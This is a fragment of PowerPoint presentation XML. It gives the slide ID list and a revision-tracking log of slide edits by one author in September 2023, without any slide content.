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8" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId41"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="340" r:id="rId3"/>
    <p:sldId id="339" r:id="rId4"/>
    <p:sldId id="369" r:id="rId5"/>
    <p:sldId id="371" r:id="rId6"/>
    <p:sldId id="372" r:id="rId7"/>
    <p:sldId id="370" r:id="rId8"/>
    <p:sldId id="374" r:id="rId9"/>
    <p:sldId id="375" r:id="rId10"/>
    <p:sldId id="386" r:id="rId11"/>
    <p:sldId id="384" r:id="rId12"/>
    <p:sldId id="376" r:id="rId13"/>
    <p:sldId id="377" r:id="rId14"/>
    <p:sldId id="378" r:id="rId15"/>
    <p:sldId id="373" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="341" r:id="rId19"/>
    <p:sldId id="387" r:id="rId20"/>
    <p:sldId id="388" r:id="rId21"/>
    <p:sldId id="343" r:id="rId22"/>
    <p:sldId id="390" r:id="rId23"/>
    <p:sldId id="389" r:id="rId24"/>
    <p:sldId id="345" r:id="rId25"/>
    <p:sldId id="344" r:id="rId26"/>
    <p:sldId id="393" r:id="rId27"/>
    <p:sldId id="392" r:id="rId28"/>
    <p:sldId id="395" r:id="rId29"/>
    <p:sldId id="342" r:id="rId30"/>
    <p:sldId id="398" r:id="rId31"/>
    <p:sldId id="346" r:id="rId32"/>
    <p:sldId id="394" r:id="rId33"/>
    <p:sldId id="391" r:id="rId34"/>
    <p:sldId id="396" r:id="rId35"/>
    <p:sldId id="347" r:id="rId36"/>
    <p:sldId id="349" r:id="rId37"/>
    <p:sldId id="397" r:id="rId38"/>
    <p:sldId id="348" r:id="rId39"/>
    <p:sldId id="337" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId4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51" roundtripDataSignature="AMtx7miiNP4TjcXgCrUnDuBQGPN+lg5d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B23392-4C56-EE4D-A772-E9632D5F2194}" v="25" dt="2023-09-13T09:06:08.420"/>
    <p1510:client id="{F1829212-D4B5-3C40-A744-9968C3A669BC}" v="17" dt="2023-09-14T05:58:26.3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807"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="133" d="100"/>
          <a:sy n="133" d="100"/>
        </p:scale>
        <p:origin x="1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dan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T06:48:38.375" v="1263" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-13T23:43:20.314" v="5" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2153254775" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-13T23:43:18.402" v="4" actId="20578"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2153254775" sldId="342"/>
            <ac:spMk id="3" creationId="{65CE2454-E3F4-40AE-9767-842B727B8802}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T01:04:21.810" v="7" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3697497860" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T01:04:21.810" v="7" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3697497860" sldId="343"/>
            <ac:spMk id="3" creationId="{A94A86AE-8B24-4A07-BF65-8182A702BF1A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:09:39.724" v="991" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2289293711" sldId="349"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:09:39.724" v="991" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289293711" sldId="349"/>
            <ac:spMk id="3" creationId="{8B7CCED9-2CC1-DCD8-A194-6513A73C3876}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T01:04:41.165" v="9" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3374454338" sldId="389"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T01:04:41.165" v="9" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3374454338" sldId="389"/>
            <ac:spMk id="3" creationId="{EE05000C-6CF8-78A1-3E55-6C4F3B90927B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:36:27.664" v="65" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3360067100" sldId="390"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:34:26.587" v="31" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360067100" sldId="390"/>
            <ac:spMk id="2" creationId="{051B4FE6-D833-0B11-ADA3-12D90914932D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:36:27.664" v="65" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360067100" sldId="390"/>
            <ac:spMk id="3" creationId="{87251103-1E60-D132-AEF3-0D3ACDDBC4C1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:05:31.555" v="973" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3992169633" sldId="391"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:48:09.947" v="479" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3992169633" sldId="391"/>
            <ac:spMk id="2" creationId="{549B3EB8-158D-43FA-4162-40442F8D5F82}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:05:31.555" v="973" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3992169633" sldId="391"/>
            <ac:spMk id="3" creationId="{C3566F5B-487D-1EE4-7CC6-6ECBD26CEC1C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T06:48:38.375" v="1263" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="208110713" sldId="392"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:37:03.698" v="84" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="208110713" sldId="392"/>
            <ac:spMk id="2" creationId="{F65C9136-06DA-4C9F-E69A-344162780549}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T06:48:38.375" v="1263" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="208110713" sldId="392"/>
            <ac:spMk id="3" creationId="{6519610A-0FD0-CCF7-237D-31705B2F9AF4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:44:43.511" v="432" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2817421322" sldId="393"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:44:06.181" v="410" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2817421322" sldId="393"/>
            <ac:spMk id="2" creationId="{6C90F001-87C5-E221-DF1C-E8A875C87A90}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:44:43.511" v="432" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2817421322" sldId="393"/>
            <ac:spMk id="3" creationId="{5EAD44DF-3F2B-3A70-42A7-E65E363FB88A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:44:43.509" v="431" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2817421322" sldId="393"/>
            <ac:spMk id="4" creationId="{9AB7B310-6C9F-9276-3A71-790843806463}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:52:11.659" v="648" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="963034450" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:45:46.665" v="446"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="963034450" sldId="394"/>
            <ac:spMk id="2" creationId="{B784B20A-B97A-3935-391D-22B51F61152F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:52:11.659" v="648" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="963034450" sldId="394"/>
            <ac:spMk id="3" creationId="{EF966A2A-1C88-9F45-8065-7E0126EF1C56}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:44:53.628" v="433" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1980632708" sldId="394"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:51:37.050" v="630" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="513697711" sldId="395"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:48:49.330" v="494" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="513697711" sldId="395"/>
            <ac:spMk id="2" creationId="{F29BC283-52FB-7CED-18C0-C81EDA9D87B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T02:51:37.050" v="630" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="513697711" sldId="395"/>
            <ac:spMk id="3" creationId="{D784C835-B5A0-AB58-4E9E-06BA20665005}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:39:37.363" v="1112" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2303387611" sldId="396"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:05:22.163" v="971"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2303387611" sldId="396"/>
            <ac:spMk id="2" creationId="{0E739C0E-87AD-DF50-097C-2BA80E9F51C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:39:37.363" v="1112" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2303387611" sldId="396"/>
            <ac:spMk id="3" creationId="{707CC3FC-1382-0257-DCA4-85C76833EB06}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:51.464" v="1068" actId="11529"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1057251493" sldId="397"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:09:09.994" v="985" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:spMk id="2" creationId="{16659E4F-0927-5A10-81EB-8E29002305ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:26.488" v="1064" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:spMk id="3" creationId="{341C74BC-95CA-9A36-7181-DE1A7E88F053}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:28.415" v="1065" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:spMk id="4" creationId="{C67F0F4B-CF1C-E193-A12C-BF3D34C86F04}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:24.656" v="1063" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:spMk id="7" creationId="{863DA479-1560-0896-76FB-2287DF86EEB3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:32.957" v="1066" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:spMk id="10" creationId="{337A0827-AE51-0C01-382B-41032AA75EF4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:25:46.118" v="1032" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:cxnSpMk id="6" creationId="{0E5BEEE4-C69F-B594-B451-47157BBB1570}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:25:43.749" v="1031" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:cxnSpMk id="9" creationId="{4D846C98-43AD-C703-C7A0-0228AC55C391}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:44.041" v="1067" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:cxnSpMk id="12" creationId="{9D7E27B4-193B-5D6A-9186-CB3C2E1615CD}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T03:26:51.464" v="1068" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057251493" sldId="397"/>
            <ac:cxnSpMk id="14" creationId="{903F15D6-93BA-C8D4-E5C5-647D4932D8AC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T05:59:10.227" v="1234" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2634890479" sldId="398"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T05:57:19.075" v="1133" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2634890479" sldId="398"/>
            <ac:spMk id="2" creationId="{F9D3BE9D-2B60-29CD-8911-0E02DE74CD72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{F1829212-D4B5-3C40-A744-9968C3A669BC}" dt="2023-09-14T05:59:10.227" v="1234" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2634890479" sldId="398"/>
            <ac:spMk id="3" creationId="{E04E7692-6BDA-1F8A-B5C1-897631E66F33}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T10:07:40.830" v="49" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T08:58:43.997" v="19" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2153254775" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T08:58:43.997" v="19" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2153254775" sldId="342"/>
            <ac:spMk id="5" creationId="{F2A82790-DF5C-4455-BE68-48B0A8F22D92}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T08:58:43.997" v="19" actId="1035"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2153254775" sldId="342"/>
            <ac:cxnSpMk id="8" creationId="{E9BFE6F6-A565-4008-B7E8-FE282008205E}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:55:13.337" v="43" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3464693460" sldId="344"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:55:13.337" v="43" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3464693460" sldId="344"/>
            <ac:spMk id="2" creationId="{5530D427-178B-4B70-8D81-D9B41E5E9D2F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod ord">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:55:01.439" v="30" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3360067100" sldId="390"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:06:08.420" v="25" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360067100" sldId="390"/>
            <ac:spMk id="2" creationId="{051B4FE6-D833-0B11-ADA3-12D90914932D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:46:52.431" v="29" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="87913996" sldId="391"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T09:41:51.754" v="27" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1141358080" sldId="391"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T10:07:40.830" v="49" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3992169633" sldId="391"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
